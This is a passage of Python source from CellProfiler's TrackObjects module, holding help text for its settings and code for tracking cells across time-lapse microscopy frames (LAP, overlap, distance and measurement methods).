this value is the score for the mitosis.</li>
</ul>
<b>Image measurements</b>
<ul>
<li><i>LostObjectCount:</i> Number of objects that appear in the previous frame
but have no identifiable child in the current frame.</li>
<li><i>NewObjectCount:</i> Number of objects that appear in the current frame but
have no identifiable parent in the previous frame. </li>
<li><i>SplitObjectCount:</i> Number of objects in the current frame that
resulted from a split from a parent object in the previous frame.</li>
<li><i>MergedObjectCount:</i> Number of objects in the current frame that
resulted from the merging of child objects in the previous frame.</li>
</ul>
See also: Any of the <b>Measure</b> modules, <b>IdentifyPrimaryObjects</b>, <b>Groups</b>.
"""%globals()
# CellProfiler is distributed under the GNU General Public License.
# See the accompanying file LICENSE for details.
#
# Copyright (c) 2003-2009 Massachusetts Institute of Technology
# Copyright (c) 2009-2015 Broad Institute
#
# Please see the AUTHORS file for credits.
#
# Website: http://www.cellprofiler.org
import logging
logger = logging.getLogger(__name__)
import numpy as np
import numpy.ma
from scipy.ndimage import distance_transform_edt
import scipy.ndimage
import scipy.sparse
import cellprofiler.cpmodule as cpm
import cellprofiler.cpimage as cpi
import cellprofiler.pipeline as cpp
import cellprofiler.settings as cps
from cellprofiler.settings import YES, NO
import cellprofiler.measurements as cpmeas
import cellprofiler.preferences as cpprefs
from cellprofiler.cpmath.lapjv import lapjv
import cellprofiler.cpmath.filter as cpfilter
from cellprofiler.cpmath.cpmorphology import fixup_scipy_ndimage_result as fix
from cellprofiler.cpmath.cpmorphology import centers_of_labels
from cellprofiler.cpmath.cpmorphology import associate_by_distance
from cellprofiler.cpmath.cpmorphology import all_connected_components
from cellprofiler.cpmath.index import Indexes
from identify import M_LOCATION_CENTER_X, M_LOCATION_CENTER_Y
from cellprofiler.gui.help import HELP_ON_MEASURING_DISTANCES
DT_COLOR_AND_NUMBER = 'Color and Number'
DT_COLOR_ONLY = 'Color Only'
DT_ALL = [DT_COLOR_AND_NUMBER, DT_COLOR_ONLY]
R_PARENT = "Parent"
F_PREFIX = "TrackObjects"
F_LABEL = "Label"
F_PARENT_OBJECT_NUMBER = "ParentObjectNumber"
F_PARENT_IMAGE_NUMBER = "ParentImageNumber"
F_TRAJECTORY_X = "TrajectoryX"
F_TRAJECTORY_Y = "TrajectoryY"
F_DISTANCE_TRAVELED = "DistanceTraveled"
F_DISPLACEMENT = "Displacement"
F_INTEGRATED_DISTANCE = "IntegratedDistance"
F_LINEARITY = "Linearity"
F_LIFETIME = "Lifetime"
F_FINAL_AGE = "FinalAge"
F_MOVEMENT_MODEL = "MovementModel"
F_LINK_TYPE = "LinkType"
F_LINKING_DISTANCE = "LinkingDistance"
F_STANDARD_DEVIATION = "StandardDeviation"
F_GAP_LENGTH = "GapLength"
F_GAP_SCORE = "GapScore"
F_MERGE_SCORE = "MergeScore"
F_SPLIT_SCORE = "SplitScore"
F_MITOSIS_SCORE = "MitosisScore"
F_KALMAN = "Kalman"
F_STATE = "State"
F_COV = "COV"
F_NOISE = "Noise"
F_VELOCITY_MODEL = "Vel"
F_STATIC_MODEL = "NoVel"
F_X = "X"
F_Y = "Y"
F_VX = "VX"
F_VY = "VY"
F_EXPT_ORIG_NUMTRACKS = "%s_OriginalNumberOfTracks"%F_PREFIX
F_EXPT_FILT_NUMTRACKS = "%s_FilteredNumberOfTracks"%F_PREFIX
def kalman_feature(model, matrix_or_vector, i, j=None):
'''Return the feature name for a Kalman feature
model - model used for Kalman feature: velocity or static
matrix_or_vector - the part of the Kalman state to save, vec, COV or noise
i - the name for the first (or only for vec and noise) index into the vector
j - the name of the second index into the matrix
'''
pieces = [F_KALMAN, model, matrix_or_vector, i]
if j is not None:
pieces.append(j)
return "_".join(pieces)
'''# of objects in the current frame without parents in the previous frame'''
F_NEW_OBJECT_COUNT = "NewObjectCount"
'''# of objects in the previous frame without parents in the new frame'''
F_LOST_OBJECT_COUNT = "LostObjectCount"
'''# of parents that split into more than one child'''
F_SPLIT_COUNT = "SplitObjectCount"
'''# of children that are merged from more than one parent'''
F_MERGE_COUNT = "MergedObjectCount"
'''Object area measurement for LAP method
The final part of the LAP method needs the object area measurement
which is stored using this name.'''
F_AREA = "Area"
F_ALL_COLTYPE_ALL = [(F_LABEL, cpmeas.COLTYPE_INTEGER),
(F_PARENT_OBJECT_NUMBER, cpmeas.COLTYPE_INTEGER),
(F_PARENT_IMAGE_NUMBER, cpmeas.COLTYPE_INTEGER),
(F_TRAJECTORY_X, cpmeas.COLTYPE_INTEGER),
(F_TRAJECTORY_Y, cpmeas.COLTYPE_INTEGER),
(F_DISTANCE_TRAVELED, cpmeas.COLTYPE_FLOAT),
(F_DISPLACEMENT, cpmeas.COLTYPE_FLOAT),
(F_INTEGRATED_DISTANCE, cpmeas.COLTYPE_FLOAT),
(F_LINEARITY, cpmeas.COLTYPE_FLOAT),
(F_LIFETIME, cpmeas.COLTYPE_INTEGER),
(F_FINAL_AGE, cpmeas.COLTYPE_INTEGER)]
F_IMAGE_COLTYPE_ALL = [(F_NEW_OBJECT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_LOST_OBJECT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_SPLIT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_MERGE_COUNT, cpmeas.COLTYPE_INTEGER)]
F_ALL = [feature for feature, coltype in F_ALL_COLTYPE_ALL]
F_IMAGE_ALL = [feature for feature, coltype in F_IMAGE_COLTYPE_ALL]
class TrackObjects(cpm.CPModule):
module_name = 'TrackObjects'
category = "Object Processing"
variable_revision_number = 6
def create_settings(self):
self.tracking_method = cps.Choice(
'Choose a tracking method',
TM_ALL, doc="""
When trying to track an object in an image,
<b>TrackObjects</b> will search within a maximum
specified distance (see the <i>distance within which to search</i> setting)
of the object's location in the previous image, looking for a "match".
Objects that match are assigned the same number, or label, throughout the
entire movie.
There are several options for the method used to find a match. Choose
among these options based on which is most consistent from frame
to frame of your movie.
<ul>
<li><i>%(TM_OVERLAP)s:</i> Compares the amount of spatial overlap between identified objects in
the previous frame with those in the current frame. The object with the
greatest amount of spatial overlap will be assigned the same number (label).
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Recommended when there is a high degree of overlap of an object from one frame to the next,
which is the case for movies with high frame rates relative to object motion.</dd>
</dl></li>
<li><i>%(TM_DISTANCE)s:</i> Compares the distance between each identified
object in the previous frame with that of the current frame. The
closest objects to each other will be assigned the same number (label).
Distances are measured from the perimeter of each object.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Recommended for cases where the objects are not very crowded but where
<i>%(TM_OVERLAP)s</i> does not work sufficiently well, which is the case
for movies with low frame rates relative to object motion.</dd>
</dl></li>
<li><i>%(TM_MEASUREMENTS)s:</i> Compares each object in the
current frame with objects in the previous frame based on a particular
feature you have measured for the objects (for example, a particular intensity
or shape measurement that can distinguish nearby objects). The object
with the closest-matching measurement will be selected as a match and will be
assigned the same number (label). This selection requires that you run the
specified <b>Measure</b> module previous to this module in the pipeline so
that the measurement values can be used to track the objects.</li>
<li><i>%(TM_LAP)s:</i> Uses the linear assignment problem (LAP) framework. The
linear assignment problem (LAP) algorithm (<i>Jaqaman et al., 2008</i>)
addresses the challenges of high object density, motion heterogeneity,
temporary disappearances, and object merging and splitting.
The algorithm first links objects between consecutive frames and then links
the resulting partial trajectories into complete trajectories. Both steps are formulated
as global combinatorial optimization problems whose solution identifies the overall
most likely set of object trajectories throughout a movie.
<p>Tracks are constructed from an image sequence by detecting objects in each
frame and linking objects between consecutive frames as a first step. This step alone
may result in incompletely tracked objects due to the appearance and disappearance
of objects, either in reality or apparently because of noise and imaging limitations.
To correct this, you may apply an optional second step which closes temporal gaps
between tracked objects and captures merging and splitting events. This step takes
place at the end of the analysis run.</p>
<p><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Some recommendations on optimizing
the LAP settings<br>
<ul>
<li><i>Work with a minimal subset of your data:</i> Attempting to optimize these settings
by examining a dataset containing many objects may be complicated and frustrating.
Therefore, it is a good idea to work with a smaller portion of the data containing the
behavior of interest.
<ul>
<li>For example, if splits characterize your data, trying narrowing down to following just
one cell that undergoes a split and examine a few frames before and after the event.</li>
<li>You can insert the <b>Crop</b> module to zoom in a region of interest, optimize the
settings and then either remove or disable the module when done.</li>
<li>You can also use the <b>Input</b> modules to limit yourself to a few frames under
consideration. For example, use the filtering settings in the <b>Images</b> module to
use only certain files from the movie in the pipeline.</li>
</ul></li>
<li><i>Begin by optimzing the settings for the first phase of the LAP:</i> The 2nd phase of
the LAP method depends on the results of the first phase. Therefore, it is a good idea to
optimize the first phase settings as the initial step.
<ul>
<li>You can disable 2nd phase calculation by selecting <i>%(NO)s</i> for "Run the second
phase of the LAP algorithm?"</li>
<li>By maximizing the the number of correct frame-to-frame links in the first phase, the
2nd phase will have less candidates to consider for linking and have a better chance of
closing gaps correctly. </li>
<li>If tracks are not being linked in the first phase, you may need to adjust the number
of standard deviations for the search radius and/or the radius limits (most likely
the maximum limit). See the help for these settings for details.</li>
</ul></li>
<li><i>Use any visualization tools at your disposal:</i>Visualizing the data often allows for
easier decision making as opposed to sorting through tabular data alone.
<ul>
<li>The <a href="http://cran.r-project.org/">R</a> open-source software package has
analysis and visualization tools that can query a database. See <a href=
"http://www.broadinstitute.org/~leek/rtracking.html">here</a> for a use case by our
lead software engineer.</li>
<li><a href="http://cellprofiler.org/tracer/">CellProfiler Tracer</a> is a version of
CellProfiler Analyst that contains tools for visualizing time-lapse data that has been exported
using the <b>ExportToDatabase</b> module.</li>
</ul></li>
</ul>
</p>
<p><b>References</b>
<ul>
<li>Jaqaman K, Loerke D, Mettlen M, Kuwata H, Grinstein S, Schmid SL, Danuser G. (2008)
"Robust single-particle tracking in live-cell time-lapse sequences."
<i>Nature Methods</i> 5(8),695-702.
<a href="http://dx.doi.org/10.1038/nmeth.1237">(link)</a></li>
<li>Jaqaman K, Danuser G. (2009) "Computational image analysis of cellular dynamics:
a case study based on particle tracking." Cold Spring Harb Protoc. 2009(12):pdb.top65.
<a href="http://dx.doi.org/10.1101/pdb.top65">(link)</a></li>
</ul></p>
</li>
</ul>"""%globals())
self.object_name = cps.ObjectNameSubscriber(
'Select the objects to track',cps.NONE, doc="""
Select the objects to be tracked by this module.""")
self.measurement = cps.Measurement(
'Select object measurement to use for tracking',
lambda : self.object_name.value, doc="""
<i>(Used only if Measurements is the tracking method)</i><br>
Select which type of measurement (category) and which specific feature from the
<b>Measure</b> module will be used for tracking. Select the feature name from
the popup box or see each <b>Measure</b> module's help for the list of
the features measured by that module. If necessary, you will also be asked
to specify additional details such as the
image from which the measurements originated or the measurement scale.""")
self.pixel_radius = cps.Integer(
'Maximum pixel distance to consider matches',50,minval=1,doc="""
Objects in the subsequent frame will be considered potential matches if
they are within this distance. To determine a suitable pixel distance, you can look
at the axis increments on each image (shown in pixel units) or
use the distance measurement tool. %(HELP_ON_MEASURING_DISTANCES)s"""%globals())
self.model = cps.Choice(
"Select the movement model",[M_RANDOM, M_VELOCITY, M_BOTH], value=M_BOTH,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
This setting controls how to predict an object's position in
the next frame, assuming that each object moves randomly with
a frame-to-frame variance in position that follows a Gaussian
distribution.<br>
<ul>
<li><i>%(M_RANDOM)s:</i> A model in which objects move due to
Brownian Motion or a similar process where the variance in position
differs between objects.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Use this model if the objects move with some
random jitter around a stationary location.</dd>
</dl></li>
<li><i>%(M_VELOCITY)s:</i> A model in which the object moves with
a velocity. Both velocity and position (after correcting for
velocity) vary following a Gaussian distribution.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Use this model if
the objects move along a spatial trajectory in some direction over time.</dd>
</dl></li>
<li><i>%(M_BOTH)s:</i> <b>TrackObjects</b> will predict each
object's position using both models and use the model with the
lowest penalty to join an object in one frame with one in another.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Use this
option if both models above are applicable over time.</dd>
</dl></li>
</ul>""" % globals())
self.radius_std = cps.Float(
RADIUS_STD_SETTING_TEXT, 3, minval=1,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i>
<br>
<b>TrackObjects</b> will estimate the standard deviation of the error
between the observed and predicted positions of an object for
each movement model. It will constrain the search for matching
objects from one frame to the next to the standard deviation
of the error times the number of standard
deviations that you enter here.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>If the standard deviation is quite small, but the object makes a
large spatial jump, this value may need to be set higher in order
to increase the search area and thereby make the frame-to-frame
linkage.</li>
</ul></dd>
</dl>"""%globals())
self.radius_limit = cps.FloatRange(
RADIUS_LIMIT_SETTING_TEXT, (2, 10), minval = 0,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
<b>TrackObjects</b> derives a search radius based on the error
estimation. Potentially, the module can make an erroneous assignment
with a large error, leading to a large estimated error for
the object in the next frame. Conversely, the module can arrive
at a small estimated error by chance, leading to a maximum radius
that does not track the object in a subsequent frame. The radius
limit constrains the maximum radius to reasonable values.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Special care must be taken to adjust the upper limit appropriate
to the data.</li>
<li>The lower limit should be set to a radius (in pixels) that is a
reasonable displacement for any object from one frame to the next. Hence,
if you notice that a frame-to-frame linkage is not being made for a
steadily-moving object, it may be that this value needs to be decreased
such that the displacement falls above the lower limit.</li>
<li>The upper limit should be set to the maximum reasonable
displacement (in pixels) under any circumstances. Hence, if you notice that
a frame-to-frame linkage is not being made in the case of a unusually
large displacement, this value may need to be increased.</li>
</ul></dd>
</dl>"""%globals())
self.wants_second_phase = cps.Binary(
"Run the second phase of the LAP algorithm?", True, doc="""
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
Select <i>%(YES)s</i> to run the second phase of the LAP algorithm
after processing all images. Select <i>%(NO)s</i> to omit the
second phase or to perform the second phase when running the module
as a data tool.
<p>Since object tracks may start and end not only because of the true appearance
and disappearance of objects, but also because of apparent disappearances due
to noise and limitations in imaging, you may want to run the second phase
which attempts to close temporal gaps between tracked objects and tries to
capture merging and splitting events.</p>
<p>For additional details on optimizing the LAP settings, see the help for each
the settings.</p>"""%globals())
self.gap_cost = cps.Integer(
'Gap closing cost', 40, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting assigns a cost to keeping a gap caused
when an object is missing from one of the frames of a track (the
alternative to keeping the gap is to bridge it by connecting
the tracks on either side of the missing frames).
The cost of bridging a gap is the distance, in pixels, of the
displacement of the object between frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the gap closing cost higher if tracks from objects in previous
frames are being erroneously joined, across a gap, to tracks from
objects in subsequent frames. </li>
<li>Set the gap closing cost lower if tracks
are not properly joined due to gaps caused by mis-segmentation.</li>
</ul></dd>
</dl></p>'''%globals())
self.split_cost = cps.Integer(
'Split alternative cost', 40, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of keeping two tracks distinct
when the alternative is to make them into one track that
splits. A split occurs when an object in one frame is assigned
to the same track as two objects in a subsequent frame.
The split cost takes two components into account:
<ul>
<li>The area of the split object relative to the area of
the resulting objects.</li>
<li>The displacement of the resulting
objects relative to the position of the original object.</li>
</ul>
The split cost is roughly measured in pixels. The split alternative cost is
(conceptually) subtracted from the cost of making the split.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The split cost should be set lower if objects are being split
that should not be split. </li>
<li>The split cost should be set higher if objects
that should be split are not.</li>
<li>If you are confident that there should be no splits present in the data,
the cost can be set to 1 (the minimum value possible)</li>
</ul></dd>
</dl>'''%globals())
self.merge_cost = cps.Integer(
'Merge alternative cost', 40, minval=1,doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of keeping two tracks
distinct when the alternative is to merge them into one.
A merge occurs when two objects in one frame are assigned to
the same track as a single object in a subsequent frame.
The merge score takes two components into account:
<ul>
<li>The area of the two objects
to be merged relative to the area of the resulting objects.</li>
<li>The displacement of the original objects relative to the final
object. </li>
</ul>
The merge cost is measured in pixels. The merge
alternative cost is (conceptually) subtracted from the
cost of making the merge.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the merge alternative cost lower if objects are being
merged when they should otherwise be kept separate. </li>
<li>Set the merge alternative cost
higher if objects that are not merged should be merged.</li>
<li>If you are confident that there should be no merges present in the data,
the cost can be set to 1 (the minimum value possible)</li>
</ul></dd>
</dl>'''%globals())
self.mitosis_cost = cps.Integer(
'Mitosis alternative cost', 80, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of not linking a parent and two daughters
via the mitosis model. the %(TM_LAP)s tracking method weighs this
cost against the score of a potential mitosis. The model expects
the daughters to be equidistant from the parent after mitosis,
so the parent location is expected to be midway between the daughters.
In addition, the model expects the daughters' areas to be equal
to the parent's area. The mitosis score is the distance error
of the parent times the area inequality ratio of the parent and
daughters (the larger of Area(daughters) / Area(parent) and
Area(parent) / Area(daughters)).<br>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>An accepted mitosis closes two gaps, so all things being equal,
the mitosis alternative cost should be approximately double the
gap closing cost.</li>
<li>Increase the mitosis alternative cost to favor more mitoses
and decrease it to prevent more mitoses candidates from being
accepted.</li>
</ul></dd>
</dl>'''%globals())
self.mitosis_max_distance = cps.Integer(
'Maximum mitosis distance, in pixel units', 40, minval=1, doc= '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the maximum allowed distance in pixels of either
of the daughter candidate centroids after mitosis from the parent candidate.
'''%globals())
self.max_gap_score = cps.Integer(
'Maximum gap displacement, in pixel units', 5, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting acts as a filter for unreasonably large
displacements during the second phase.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The maximum gap displacement should be set to roughly
the maximum displacement of an object's center from frame to frame. An object that makes large
frame-to-frame jumps should have a higher value for this setting than one that only moves slightly.</li>
<li>Be aware that the LAP algorithm will run more slowly with a higher maximum gap displacement
value, since the higher this value, the more objects that must be compared at each step.</li>
<li>Objects that would have been tracked between successive frames for a lower maximum displacement
may not be tracked if the value is set higher.</li>
<li>This setting may be the culprit if an object is not tracked fame-to-frame despite optimizing
the LAP first-pass settings.</li>
</ul></dd>
</dl>'''%globals())
self.max_merge_score = cps.Integer(
'Maximum merge score', 50, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting acts as a filter for unreasonably large
merge scores. The merge score has two components:
<ul>
<li>The area of the resulting merged object relative to the area of the
two objects to be merged.</li>
<li>The distances between the objects to be merged and the resulting object. </li>
</ul>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The LAP algorithm will run more slowly with a higher maximum merge score value. </li>
<li>Objects that would have been merged at a lower maximum merge score will not be considered for merging.</li>
</ul></dd>
</dl>'''%globals())
self.max_split_score = cps.Integer(
'Maximum split score', 50, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting acts as a filter for unreasonably large split scores. The split score has two components:
<ul>
<li>The area of the initial object relative to the area of the
two objects resulting from the split.</li>
<li>The distances between the original and resulting objects. </li>
</ul>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The LAP algorithm will run more slowly with a maximum split score value. </li>
<li>Objects that would have been split at a lower maximum split score will not be considered for splitting.</li>
</ul></dd>
</dl>'''%globals())
self.max_frame_distance = cps.Integer(
'Maximum temporal gap, in frames', 5, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
<b>Care must be taken to adjust this setting appropriate to the data.</b><br>
This setting controls the maximum number of frames that can
be skipped when merging a temporal gap caused by an unsegmented object.
These gaps occur when an image is mis-segmented and identification
fails to find an object in one or more frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the maximum gap higher in order to have more chance of correctly recapturing an object after
erroneously losing the original for a few frames.</li>
<li>Set the maximum gap lower to reduce the chance of erroneously connecting to the wrong object after
correctly losing the original object (e.g., if the cell dies or moves off-screen).</li>
</ul></dd>
</dl>'''%globals())
self.wants_lifetime_filtering = cps.Binary(
'Filter objects by lifetime?', False, doc = '''
Select <i>%(YES)s</i> if you want objects to be filtered by their
lifetime, i.e., total duration in frames. This is useful for
marking objects which transiently appear and disappear, such
as the results of a mis-segmentation. <br>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>This operation does not actually delete the filtered object,
but merely removes its label from the tracked object list;
the filtered object's per-object measurements are retained.</li>
<li>An object can be filtered only if it is tracked as an unique object.
Splits continue the lifetime count from their parents, so the minimum
lifetime value does not apply to them.</li>
</ul></dd>
</dl>'''%globals())
self.wants_minimum_lifetime = cps.Binary(
'Filter using a minimum lifetime?', True, doc = '''
<i>(Used only if objects are filtered by lifetime)</i><br>
Select <i>%(YES)s</i> to filter the object on the basis of a minimum number of frames.'''%globals())
self.min_lifetime = cps.Integer(
'Minimum lifetime', 1, minval=1,doc="""
Enter the minimum number of frames an object is permitted to persist. Objects
which last this number of frames or lower are filtered out.""")
self.wants_maximum_lifetime = cps.Binary(
'Filter using a maximum lifetime?', False, doc = '''
<i>(Used only if objects are filtered by lifetime)</i><br>
Select <i>%(YES)s</i> to filter the object on the basis of a maximum number of frames.'''%globals())
self.max_lifetime = cps.Integer(
'Maximum lifetime', 100, doc="""
Enter the maximum number of frames an object is permitted to persist. Objects
which last this number of frames or more are filtered out.""")
self.display_type = cps.Choice(
'Select display option', DT_ALL, doc="""
The output image can be saved as:
<ul>
<li><i>%(DT_COLOR_ONLY)s:</i> A color-labeled image, with each tracked
object assigned a unique color</li>
<li><i>%(DT_COLOR_AND_NUMBER)s:</i> Same as above but with the tracked object
number superimposed.</li>
</ul>"""%globals())
self.wants_image = cps.Binary(
"Save color-coded image?", False, doc="""
Select <i>%(YES)s</i> to retain the image showing the tracked objects
for later use in the pipeline. For example, a common use is for quality control purposes
saving the image with the <b>SaveImages</b> module.
<p>Please note that if you are using the second phase of the %(TM_LAP)s method,
the final labels are not assigned until <i>after</i> the pipeline has
completed the analysis run. That means that saving the color-coded image
will only show the penultimate result and not the final product.</p>."""%globals())
self.image_name = cps.ImageNameProvider(
"Name the output image", "TrackedCells", doc = '''
<i>(Used only if saving the color-coded image)</i><br>
Enter a name to give the color-coded image of tracked labels.''')
def settings(self):
return [self.tracking_method, self.object_name, self.measurement,
self.pixel_radius, self.display_type, self.wants_image,
self.image_name, self.model,
self.radius_std, self.radius_limit,
self.wants_second_phase,
self.gap_cost, self.split_cost, self.merge_cost,
self.max_gap_score, self.max_split_score,
self.max_merge_score, self.max_frame_distance,
self.wants_lifetime_filtering, self.wants_minimum_lifetime,
self.min_lifetime, self.wants_maximum_lifetime,
self.max_lifetime, self.mitosis_cost, self.mitosis_max_distance]
def validate_module(self, pipeline):
'''Make sure that the user has selected some limits when filtering'''
if (self.tracking_method == TM_LAP and
self.wants_lifetime_filtering.value and
(self.wants_minimum_lifetime.value == False and self.wants_minimum_lifetime.value == False) ):
raise cps.ValidationError(
'Please enter a minimum and/or maximum lifetime limit',
self.wants_lifetime_filtering)
def visible_settings(self):
result = [self.tracking_method, self.object_name]
if self.tracking_method == TM_MEASUREMENTS:
result += [ self.measurement]
if self.tracking_method == TM_LAP:
result += [self.model, self.radius_std, self.radius_limit]
result += [self.wants_second_phase]
if self.wants_second_phase:
result += [
self.gap_cost, self.split_cost, self.merge_cost,
self.mitosis_cost,
self.max_gap_score, self.max_split_score,
self.max_merge_score, self.max_frame_distance,
self.mitosis_max_distance]
else:
result += [self.pixel_radius]
result += [ self.wants_lifetime_filtering]
if self.wants_lifetime_filtering:
result += [ self.wants_minimum_lifetime ]
if self.wants_minimum_lifetime:
result += [ self.min_lifetime ]
result += [ self.wants_maximum_lifetime ]
if self.wants_maximum_lifetime:
result += [ self.max_lifetime ]
result +=[ self.display_type, self.wants_image]
if self.wants_image.value:
result += [self.image_name]
return result
@property
def static_model(self):
return self.model in (M_RANDOM, M_BOTH)
@property
def velocity_model(self):
return self.model in (M_VELOCITY, M_BOTH)
def get_ws_dictionary(self, workspace):
return self.get_dictionary(workspace.image_set_list)
def __get(self, field, workspace, default):
if self.get_ws_dictionary(workspace).has_key(field):
return self.get_ws_dictionary(workspace)[field]
return default
def __set(self, field, workspace, value):
self.get_ws_dictionary(workspace)[field] = value
def get_group_image_numbers(self, workspace):
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
d = self.get_ws_dictionary(workspace)
group_number = m.get_group_number()
if not d.has_key("group_number") or d["group_number"] != group_number:
d["group_number"] = group_number
group_indexes = np.array([
(m.get_measurement(cpmeas.IMAGE, cpmeas.GROUP_INDEX, i), i)
for i in m.get_image_numbers()
if m.get_measurement(cpmeas.IMAGE, cpmeas.GROUP_NUMBER, i) ==
group_number], int)
order = np.lexsort([group_indexes[:, 0]])
d["group_image_numbers"] = group_indexes[order, 1]
return d["group_image_numbers"]
def get_saved_measurements(self, workspace):
return self.__get("measurements", workspace, np.array([], float))
def set_saved_measurements(self, workspace, value):
self.__set("measurements", workspace, value)
def get_saved_coordinates(self, workspace):
return self.__get("coordinates", workspace, np.zeros((2,0), int))
def set_saved_coordinates(self, workspace, value):
self.__set("coordinates", workspace, value)
def get_orig_coordinates(self, workspace):
'''The coordinates of the first occurrence of an object's ancestor'''
return self.__get("orig coordinates", workspace, np.zeros((2,0), int))
def set_orig_coordinates(self, workspace, value):
self.__set("orig coordinates", workspace, value)
def get_saved_labels(self, workspace):
return self.__get("labels", workspace, None)
def set_saved_labels(self, workspace, value):
self.__set("labels", workspace, value)
def get_saved_object_numbers(self, workspace):
return self.__get("object_numbers", workspace, np.array([], int))
def set_saved_object_numbers(self, workspace, value):
return self.__set("object_numbers", workspace, value)
def get_saved_ages(self, workspace):
return self.__get("ages", workspace, np.array([], int))
def set_saved_ages(self, workspace, values):
self.__set("ages", workspace, values)
def get_saved_distances(self, workspace):
return self.__get("distances", workspace, np.zeros((0,)))
def set_saved_distances(self, workspace, values):
self.__set("distances", workspace, values)
def get_max_object_number(self, workspace):
return self.__get("max_object_number", workspace, 0)
def set_max_object_number(self, workspace, value):
self.__set("max_object_number", workspace, value)
def get_kalman_states(self, workspace):
return self.__get("kalman_states", workspace, None)
def set_kalman_states(self, workspace, value):
self.__set("kalman_states", workspace, value)
def prepare_group(self, workspace, grouping, image_numbers):
'''Erase any tracking information at the start of a run'''
d = self.get_dictionary(workspace.image_set_list)
d.clear()
return True
def measurement_name(self, feature):
'''Return a measurement name for the given feature'''
if self.tracking_method == TM_LAP:
return "%s_%s" % (F_PREFIX, feature)
return "%s_%s_%s" % (F_PREFIX, feature, str(self.pixel_radius.value))
def image_measurement_name(self, feature):
'''Return a measurement name for an image measurement'''
if self.tracking_method == TM_LAP:
return "%s_%s_%s" % (F_PREFIX, feature, self.object_name.value)
return "%s_%s_%s_%s" % (F_PREFIX, feature, self.object_name.value,
str(self.pixel_radius.value))
def add_measurement(self, workspace, feature, values):
'''Add a measurement to the workspace's measurements
workspace - current image set's workspace
feature - name of feature being measured
values - one value per object
'''
workspace.measurements.add_measurement(
self.object_name.value,
self.measurement_name(feature),
values)
def add_image_measurement(self, workspace, feature, value):
measurement_name = self.image_measurement_name(feature)
workspace.measurements.add_image_measurement(measurement_name, value)
def run(self, workspace):
objects = workspace.object_set.get_objects(self.object_name.value)
if self.tracking_method == TM_DISTANCE:
self.run_distance(workspace, objects)
elif self.tracking_method == TM_OVERLAP:
self.run_overlap(workspace, objects)
elif self.tracking_method == TM_MEASUREMENTS:
self.run_measurements(workspace, objects)
elif self.tracking_method == TM_LAP:
self.run_lapdistance(workspace, objects)
else:
raise NotImplementedError("Unimplemented tracking method: %s" %
self.tracking_method.value)
if self.wants_image.value:
import matplotlib.figure
import matplotlib.axes
import matplotlib.backends.backend_agg
import matplotlib.transforms
from cellprofiler.gui.cpfigure_tools import figure_to_image, only_display_image
figure = matplotlib.figure.Figure()
canvas = matplotlib.backends.backend_agg.FigureCanvasAgg(figure)
ax = figure.add_subplot(1,1,1)
self.draw(objects.segmented, ax,
self.get_saved_object_numbers(workspace))
#
# This is the recipe for just showing the axis
#
only_display_image(figure, objects.segmented.shape)
image_pixels = figure_to_image(figure, dpi=figure.dpi)
image = cpi.Image(image_pixels)
workspace.image_set.add(self.image_name.value, image)
if self.show_window:
workspace.display_data.labels = objects.segmented
workspace.display_data.object_numbers = \
self.get_saved_object_numbers(workspace)
def display(self, workspace, figure):
if hasattr(workspace.display_data, "labels"):
figure.set_subplots((1, 1))
subfigure = figure.figure
subfigure.clf()
ax = subfigure.add_subplot(1,1,1)
self.draw(workspace.display_data.labels, ax,
workspace.display_data.object_numbers)
else:
# We get here after running as a data tool
figure.figure.text(.5, .5, "Analysis complete",
ha="center", va="center")
def draw(self, labels, ax, object_numbers):
import matplotlib
indexer = np.zeros(len(object_numbers)+1,int)
indexer[1:] = object_numbers
#
# We want to keep the colors stable, but we also want the
# largest possible separation between adjacent colors. So, here
# we reverse the significance of the bits in the indices so
# that adjacent number (e.g. 0 and 1) differ by 128, roughly
#
